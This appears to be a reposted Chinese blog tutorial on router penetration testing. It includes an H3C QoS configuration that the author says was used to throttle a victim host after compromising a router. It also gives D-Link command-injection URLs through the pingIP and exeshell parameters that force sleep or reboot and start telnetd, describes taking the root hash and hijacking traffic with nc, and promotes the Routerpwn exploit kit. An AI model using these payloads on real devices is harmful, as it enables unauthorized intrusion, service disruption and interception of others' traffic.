想在国内找一些路由渗透的纪实,但还是木有什么结果,就是今晚给国内某路由厂商提交一些漏洞时,还被人家鄙视了,哎。什么狗屁心态。不管了,留给我未来的 儿子玩吧。说不定可以搞出什么东西。呵呵,扯远了,今晚就结合国外的一些科普文做一些讲解吧。大牛别喷我,我也只是自己写写笔记意淫意淫….别喷!
++++++我是淫荡的分割线++++++++
一,为什么要定义单独的路由安全?
(1)对于渗透湿而言:
如今,更多的渗透湿都是重在于web层的渗透,总是通过各种大杀器拿下内网机器权限,然后各种嗅探,但半天才发现,坑!内网划分了vlan 。(tip:VLAN(Virtual Local Area Network)的中文名为”虚拟局域网”。VLAN是一种将局域网设备从逻辑上划分成一个个网段,从而实现虚拟工作组的新兴数据交换技术。这一新兴技术 主要应用于交换机和路由器中,但主流应用还是在交换机之中。)对于到这一层,很多人都是放弃了,或者去换了别的奇技淫巧,更是APT.但往往我们的收获却 是很少很少,对于那些白帽做内网的授权渗透时,web服务器的数量更是越来越少,但由于公司对员工的管理以及安全部署,更是划分了各种vlan保护数据的 安全和员工的限制。有些对数据敏感的公司,为了防止来公司参观的领导和游客分别划分了wifi 的vlan,这是为什么?原来越多渠道通过wifi和路由安全这个平台向内网的数据伸手,由wifi到核心数据盗取的案例已经很多了,手法都是差不多的, 你懂的。
(2)对于管理员而言:
路由器和交换机,还有硬防只是个用来联网的设备,而这些也往往是问题的所在,如今的管理员更多投入在服务器的安全上,网站打开慢?mysql发包 数没设置好吧!有时开的有时卡?论坛插件太臃肿了吧!甚至是监控平台,都仅仅是写系统的性能状况。。却没关注路由的安全。你会说,靠,黄昏,扯了半天,你 还是没把我的站日下….我给我自己划了个vlan,vps用了某某宝加速,还用某某狗看门,看你怎么进,跟你说喔,上周某某宝还举行比赛,然后添加了很多 规则,我看你怎么绕。。。 看到这里,我也顿时语塞,难度好大…..
换一种方法,找到另一个vlan,没狗狗,没宝宝的,然后提权……通过命令识别路由类型和型号,最后在网上找到路由漏洞的exp,拿到路由权限…(ps:这里环境很多,有三层交换机的,还有注意其中的树协议 )
然后就是限速啦~!这里就是h3c的限速规则
# 配置ACL规则匹配源IP为10.0.0.2的流量
1
2
3
4
|
<H3C> system-view
[H3C] acl number 3001
[H3C-acl-adv-3001] rule permit ip source 10.0.0.2 0
[H3C-acl-adv-3001] quit
|
# 配置ACL规则匹配目的IP为10.0.0.20的流量
1
2
3
|
[H3C] acl number 3002
[H3C-acl-adv-3002] rule permit ip destination 10.0.0.2 0
[H3C-acl-adv-3002] quit
|
# 配置流分类,匹配ACL规则3001,即匹配源IP为10.0.0.20的流量
1
2
3
|
[H3C] traffic classifier source_hostA
[H3C-classifier-source_hostA] if-match acl 3001
[H3C-classifier-source_hostA] quit
|
# 配置流分类,匹配ACL规则3002,即匹配目的IP为10.0.0.20的流量
1
2
3
|
[H3C] traffic classifier destination_hostA
[H3C-classifier-destination_hostA] if-match acl 3002
[H3C-classifier-destination_hostA] quit
|
# 配置流行为,用于对上行流量进行流量监管,速率为100kbps
1
2
3
|
[H3C] traffic behavior uplink
[H3C-behavior-uplink] car cir 100
[H3C-behavior-uplink] quit
|
# 配置流行为,用于对下行流量进行流量监管,速率为100kbps
1
2
3
|
[H3C] traffic behavior downlink
[H3C-behavior-downlink] car cir 100
[H3C-behavior-downlink] quit
|
# 配置QoS策略,用于端口入方向,即用户的上行方向
1
2
3
|
[H3C] qos policy uplink
[H3C-qospolicy-uplink] classifier source_hostA behavior uplink
[H3C-qospolicy-uplink] quit
|
# 配置QoS策略,用于端口出方向,即用户的下行方向
1
2
3
|
[H3C] qos policy downlink
[H3C-qospolicy-downlink] classifier destination_hostA behavior downlink
[H3C-qospolicy-downlink] quit
|
# 在端口上下发QoS策略,匹配出入方向的流量
1
2
3
|
[H3C] interface GigabitEthernet 3/0/1
[H3C-GigabitEthernet3/0/1] qos apply policy uplink inbound
[H3C-GigabitEthernet3/0/1] qos apply policy downlink outbound
|
然后处于内网的10.0.0.20 ,上传只有1kb 下载只有1kb 了,网站就这样开不了了
开始那个机油以为我爆了dns的菊花,但结果并不是,DDOS?我一个小菜怎么肯能干掉某宝宝。。。最后告诉他是我改了中控路由。。。最最后怎么 办,只好协同机房的机油一起修补了这个洞…..方法就是 更新路由器固件 。简单点说法,就是给路由器刷机….点到即止。。只要拿到了路由权限可以干很多事情!!!因为你手里控制着整个机房的流量…你说流量能干吗???
建议你去看看刺总的文章,详情猛戳 这里 互联网如何赚钱 http://taosay.net/?p=506
二.废话后的冰J凌
(1)好热的天….扯了这么多废话,再次回到路由器的构架上….
无论何时何地,路由器的配置总是最低的 一般都是4~128MB的内存 4M或者8MB的闪存,还有80~900HZ的处理器,哎,现在的手机处理器动不动就是双核1.5GHz 完爆路由器配置啊,但是路由器只是作为一个行为管理和流量,协议处理的机器,并不需要太多的页面于用户进行交互,所以,没有所以了,大部分路由器都是采用 linux系统,所以很多时候可以通过内核漏洞进行远程溢出或者其他方法提权。
(2) 默认密码,不同路有密码不一样…还有一些路由返厂密码…唉,利用方法后边会介绍的
(3) 默认的telnet
(4) 开放的端口
1
2
3
4
5
|
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
|
(5) 呵呵,猥琐的时候,能接触到实体机,可以自己改装JTAG接口直接读数据…啪啪啪
(6) Web登陆界面的burp爆破…你懂的
(7) 很多地方没有过滤,可以用很多姿势插入代码(xss)
(8) 管理员认证绕过
(9) 远程命令执行….啪啪啪
(10) perl有着“taint mode” php输出未认证和过滤
(11) 网站和路由器往往与JS验证输入,而不是之后GET / POST
(12) 通过劫持输出源,并加以利用,比如说QQ空间载入的第一个跳转。。呵呵,你懂的
(13) 目录遍历,password文件下载
以上都是总结出来的…
下边来个实例 D-LINK的….
比如说 ping测试,可以被系统直接调用,和输出,但这里木有过滤
1
|
http://192.168.0.1/tools_vct.php?pingIP=192.168.0.1
|
我们可以用这种姿势插入
比如说让路由器进入休眠状态,后入!后入30个休眠命令
1
|
http://192.168.0.1/tools_vct.php?pingIP=127.0.0.1%3B%20sleep,2030%
|
其中要加入个空格,转成20% ,很多时候做路由渗透测试,没有进行转义,导致没有执行成功就以为没有洞….我就因此错过了几个,虽然后边自己也发现了,所以在这提醒一下大家 :D
睡前再来条黄瓜吧,这条黄瓜就是
http://192.168.0.1/tools_system.php
它能够重启路由器,也就是能被系统直接调用,后来我们在路由器固件里发现了利用的js
1
|
http://192.168.0.1/sys_config_valid.xgi?exeshell=submit%20REBOOT
|
唉,就像是csrf+远程命令执行
exeshell是一个非常淫荡的变量名
还可以这样继续插入,啪啪啪,路由器休眠了
1
|
http://192.168.0.1/sys_config_valid.xgi?exeshell =%60sleep 30%60
|
呵呵,你又开始鄙视我了 屌丝黄昏,你除了会关我路由器你还能干吗?你除了会啪啪啪还会什么?
前边提到了exeshell是一个非常淫荡的变量名
然后我们这样插入
1
|
http://192.168.0.1/sys_config_valid.xgi?exeshell =%60telnetd%60
|
然后你的telnet就打开了,我能干啥???你说我能干啥??我还能干啥?直接用这个exeshell读取root的hash值,然后啪啪啪进入你的telnet,装个改装版的nc,直接进行流量劫持….我感觉这个才是真正的流量劫持啊……
总结
看了这篇文章你肯定会问,屌丝黄昏,有木有路由渗透的大杀器,我的回答是,有!但是很少,比如说BT5,msf里边都有,还有routeker渗透套件,不过估计routeker还需要很久才会公布,这里就推荐一款国外的吧
Routerpwn
Routerpwn渗透测试是一种住宅的路由器的安全审计工具。
这是一个编译运行本地和远程网络攻击的准备。 JavaScript和HTML编程以运行在所有的“智能手机和移动互联网设备。您可以使用当地开采离线没有互联网连接。 您可以更改,目的IP地址,点击[IP]链接旁边的漏洞。
其中可以利用
DNS-320的D-Link DNS-325执行命令
DNS-320的D-Link DNS-325的信息披露
DNS-320的D-Link DNS-325的信息披露
TRENDNET TV-IP摄像机绕过认证
还有什么缺的地方大家提出来一起探讨吧 :D
91ri.org:不多说,赞。
link:http://www.arc5ch.com/archives/510
本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号